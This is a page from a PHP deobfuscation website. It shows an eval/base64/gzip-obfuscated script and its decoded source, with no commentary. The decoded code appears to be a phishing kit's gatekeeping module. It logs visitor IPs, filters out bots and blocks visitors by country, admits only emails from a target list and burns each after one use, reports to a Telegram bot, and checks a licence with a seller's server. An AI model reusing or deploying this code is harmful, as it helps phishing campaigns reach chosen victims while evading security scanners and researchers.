Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

eval(gzuncompress(base64_decode('eJwNljWuxQgCBI+zM3JgJm1kZsbnZGVmZp9+f9R5l6rV5ZUO/9TfOeXzu..

Decoded Output download

//basic
function curll($url)
{
    $arrContextOptions = [
        "ssl" => ["verify_peer" => false, "verify_peer_name" => false],
    ];
    $result = file_get_contents($url, false, stream_context_create($arrContextOptions));
    return $result;
}

//basic
function redirect_req($rurl)
{
    header("Location: " . $rurl);
    exit();
}


function keeplog($record_visit,$remoteip,$u_agent){
    global $rlog;
if ($record_visit) {
    file_put_contents($rlog, $remoteip . "		" . $u_agent . "
", FILE_APPEND);
  }
}


function temp_ip($remoteip){
    global $tlog;
    $clean_ip = filter_var($remoteip, FILTER_SANITIZE_NUMBER_INT);
    file_put_contents($tlog, $clean_ip . "
", FILE_APPEND);
}

function teleg($msg)
{
    global $bot_token, $chat_id;
    curll("https://api.telegram.org/bot" . $bot_token . "/sendMessage?chat_id=" . $chat_id . "&text=" . $msg . "&disable_web_page_preview=True");

}

function blocked_res($userip)
{
    return "<pre>Detail: IP=" . $userip . " Country=" . getip($userip)[0] . "</pre>";
}


//grabbing ip information using external source 
function getip($remote_user_ip)
{
    $get_user_ip = curll("http://ip-api.com/json/" . $remote_user_ip);
    $ip_to_json = json_decode($get_user_ip);
    if ($ip_to_json->status === 'success') {
        return array($ip_to_json->country, $ip_to_json->countryCode);
    } else {
        $get_user_ip = curll("http://www.geoplugin.net/json.gp?ip=" . $remote_user_ip);
        $ip_to_json = json_decode($get_user_ip);
        return array($ip_to_json->geoplugin_countryName, $ip_to_json->geoplugin_countryCode);
    }

}


//blocking using country short name
function country_blocking($grab_remote_ip, $list_of_countries)
{
    $countryCode = getip($grab_remote_ip)[1];
    if (!in_array($countryCode, $list_of_countries)) {
        return true;

    }

}


function email_blocking()
{
    global $list_email;
    
    $getemail = $_GET['remail'];
    $mylist = file_get_contents($list_email);
    if (!isset($_GET['remail'])) {
        return true;
    }
    if (!filter_var($getemail, FILTER_VALIDATE_EMAIL)) {
        return true;
    }
    if (!preg_match("#{$getemail}#", $mylist)) {
        return true;
    }

    $e_content = file_get_contents($list_email);
    $e_content = str_replace($getemail, '', $e_content);
    file_put_contents($list_email, $e_content);
    return false;

}


//function that controls kill bot
function kill_bot($user_agent, $killbot_api, $grab_ip)
{
    $getDataKill = curll("https://killbot.org/api/v2/blocker?ip=" . $grab_ip . "&apikey=" . $killbot_api . "&ua=" . $user_agent . "&url=" . $_SERVER['REQUEST_URI']);
    $getData = json_decode($getDataKill);
    if ($getData->{'data'}->{'block_access'}) {
        return true;
    }

}



function antibotpw($user_agent, $anti_botpw, $grab_ip)
{
    $resp_pw = curll("https://antibot.pw/api/v2-blockers?ip=" . $grab_ip . "&apikey=" . $anti_botpw . "&ua=" . $user_agent);
    $pw_data = json_decode($resp_pw);
    if ($pw_data->{'block_access'}) {
        return true;
    }
}




function fill_json($key, $value)
{
    global $filename;
    $json = file_get_contents($filename);
    $datajson = json_decode($json, true);
    $datajson[$key] = $value;
    file_put_contents($filename, json_encode($datajson));

}


function read_json($key)
{

    global $filename;
    $json = file_get_contents($filename);
    $datajson = json_decode($json, true);
    return $datajson[$key];

}

//make a json file to keep record
function make_json_file()
{
    global $filename;
    $task_json_array = array(
        'date' => 1676039708,
        'date_cap' => 1676039708,
        "domain" => "https://t.me/badaxxbot"
    );


    if (!file_exists($filename)) {
        file_put_contents($filename, json_encode($task_json_array));
    }

}

make_json_file();


function task_timer_url()
{

    $currentTime = time();
    $old_time = read_json("date");
    $difference = $currentTime - $old_time;
    $differenceInMinutes = $difference / 60;
    return $differenceInMinutes;

}



function task_timer_cap()
{

    $currentTime = time();
    $old_time = read_json("date_cap");
    $difference = $currentTime - $old_time;
    $differenceInMinutes = $difference / 60;
    return $differenceInMinutes;

}


function redirect($url_check, $red_key){
    global $urls_file;
    $currentTime = time();
    if (task_timer_url() > $url_check) {
        foreach (file($urls_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $d) {
            $result = curll("https://vv.mustleak.com/auth?domain=" . $d . "&key=" . urlencode($red_key) . "&host=" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"] . "&v=v_25.0");
            if ($result == "0") {
                $domains = [$d];
                fill_json('domain', $domains[0]);
                return true;
            } elseif ($result == "2") {
                exit('Message me at https://t.me/badaxxbot or email me [email protected] for activation key');
            } elseif ($result == "1") {
                $content = file_get_contents($urls_file);
                $content = str_replace($d, "", $content);
                file_put_contents($urls_file, $content);
                teleg("this domain is bad ".$d);

            } else {
                exit("unable to perform verifications, please check your hosting");


            }
        }

        
        fill_json("date", $currentTime);

    }

    
    return true;



}




function google_cap($grecaptcha_key, $grab_domain, $grecap_writeup, $activated, $generate_cap_timer)
{
    global $gcap;
    if (task_timer_cap() > $generate_cap_timer) {
    $currentTime = time();
    $getcap = curll("https://vv.mustleak.com/google?key=" . $grecaptcha_key . "&domain=" . $grab_domain . "&text=" . $grecap_writeup . "&activated=" . $activated);
    file_put_contents($gcap, $getcap);
    fill_json("date_cap", $currentTime);
    }

    return true;

}


function antibot($us_agent, $us_ip,$activated)
{
    $resutlt = curll("https://vv.mustleak.com/bot?ip?=" . $us_ip . "&ua=" . $us_agent . "&key=" . $activated);
    $data = json_decode($resutlt, true);
    if (!$data['ok']) {
        return true;
    }
}

Did this file decode correctly?

Original Code

eval(gzuncompress(base64_decode('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')));

Function Calls

gzuncompress 2
base64_decode 2

Variables

None

Stats

MD5 d66c5d917d75b658367dd2c273cde11c
Eval Count 2
Decode Time 67 ms